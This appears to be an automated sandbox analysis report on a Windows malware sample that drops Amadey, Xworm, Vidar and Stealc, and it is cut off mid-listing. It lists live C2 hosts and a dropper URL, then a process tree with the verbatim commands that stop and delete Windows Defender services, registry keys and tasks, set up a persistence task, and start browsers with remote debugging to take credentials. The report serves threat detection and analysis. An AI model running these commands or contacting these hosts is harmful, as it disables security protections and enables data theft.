Analysis

  • max time kernel
    84s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/03/2025, 07:12

General

  • Target

    c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe

  • Size

    1.9MB

  • MD5

    c9e35f3be0a99258747eee4b2bef19f2

  • SHA1

    ba70a487a2da7acb8cfc4a761a4dd8b095cdcb59

  • SHA256

    c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e

  • SHA512

    8e417bf09007f65fd96c8ec31b212e7069f3f74c1bdaf08ec41da0edd5b15c453396f12c815d20058ff37d05bb9a2fa8ba527f3977112f00b864995d9ff42d6e

  • SSDEEP

    24576:pZlgrTXxqn0airby/O/D9SsVkl8UxjgpLLyn2o+HlmzQJ57IwHC6iPlHi9a2Mi:pHg3XcerO/O7jk6Ux2/o+Hdb9HGO2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

b.strongest.network:22394

Mutex

g0tzhJeA9KqJ5VDD

Attributes
  • Install_directory

    %AppData%

  • install_file

    MsWin32tart.exe

aes.plain

Extracted

Family

vidar

Version

13.3

Botnet

70790cf457f5ee5e9df1780bfa648812

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 30 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 12 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 17 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe
    "C:\Users\Admin\AppData\Local\Temp\c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5672
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
        "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:224
      • C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Users\Admin\AppData\Local\Temp\22.exe
          "C:\Users\Admin\AppData\Local\Temp\22.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5536
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B834.tmp\B835.tmp\B836.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3492
            • C:\Users\Admin\AppData\Local\Temp\22.exe
              "C:\Users\Admin\AppData\Local\Temp\22.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B9F9.tmp\B9FA.tmp\B9FB.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:3080
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:5628
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:5928
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:3116
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1948
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:2936
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:4092
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3484
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:5196
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:2908
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:3352
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:4608
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:5268
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:5996
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:5868
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2448
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:5084
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:4220
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:5724
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:4808
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:5720
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:736
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                          • Modifies security service
                          PID:3656
                        • C:\Windows\system32\sc.exe
                          sc stop "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:5800
                        • C:\Windows\system32\sc.exe
                          sc delete "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:972
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                          8⤵
                            PID:5528
                          • C:\Windows\system32\sc.exe
                            sc stop "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:1920
                          • C:\Windows\system32\sc.exe
                            sc delete "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:1020
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                            8⤵
                              PID:1028
                            • C:\Windows\system32\sc.exe
                              sc stop "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:3976
                            • C:\Windows\system32\sc.exe
                              sc delete "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:4308
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                              8⤵
                                PID:4200
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:1812
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:3308
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                8⤵
                                  PID:752
                                • C:\Windows\system32\sc.exe
                                  sc stop "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5016
                                • C:\Windows\system32\sc.exe
                                  sc delete "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2788
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                  8⤵
                                    PID:6008
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:6068
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:3188
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                    8⤵
                                      PID:6028
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:5936
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:6084
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                      8⤵
                                        PID:5144
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2248
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3984
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                        8⤵
                                          PID:464
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1716
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:6056
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                          8⤵
                                            PID:4548
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:916
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1456
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                            8⤵
                                              PID:4240
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2220
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:5136
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                              8⤵
                                                PID:4612
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                8⤵
                                                  PID:4224
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                  8⤵
                                                    PID:2184
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                    8⤵
                                                      PID:4276
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                      8⤵
                                                        PID:544
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:5264
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:5732
                                            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1772
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2272
                                            • C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"
                                              3⤵
                                              • Checks computer location settings
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious behavior: AddClipboardFormatListener
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3076
                                              • C:\Windows\System32\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MsWin32tart" /tr "C:\Users\Admin\AppData\Roaming\MsWin32tart.exe"
                                                4⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:312
                                            • C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4904
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4380
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  5⤵
                                                  • Uses browser remote debugging
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:3088
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff82fc6dcf8,0x7ff82fc6dd04,0x7ff82fc6dd10
                                                    6⤵
                                                      PID:1992
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1992 /prefetch:2
                                                      6⤵
                                                        PID:5332
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2240 /prefetch:3
                                                        6⤵
                                                          PID:540
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2292 /prefetch:8
                                                          6⤵
                                                            PID:4392
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:1
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:2272
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3264 /prefetch:1
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:5160
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4296 /prefetch:2
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:4688
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4612 /prefetch:1
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:2656
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5188 /prefetch:8
                                                            6⤵
                                                              PID:3976
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,14786897920262822377,5029363170471286251,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5520 /prefetch:8
                                                              6⤵
                                                                PID:5356
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                              5⤵
                                                              • Uses browser remote debugging
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              • Modifies data under HKEY_USERS
                                                              • Modifies registry class
                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5068
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ff81e52f208,0x7ff81e52f214,0x7ff81e52f220
                                                                6⤵
                                                                  PID:4112
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1692,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:3
                                                                  6⤵
                                                                    PID:1044
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2420,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:2
                                                                    6⤵
                                                                      PID:2804
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1928,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:8
                                                                      6⤵
                                                                        PID:3052
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3852
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:5292
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4516,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=4480 /prefetch:8
                                                                        6⤵
                                                                          PID:6412
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
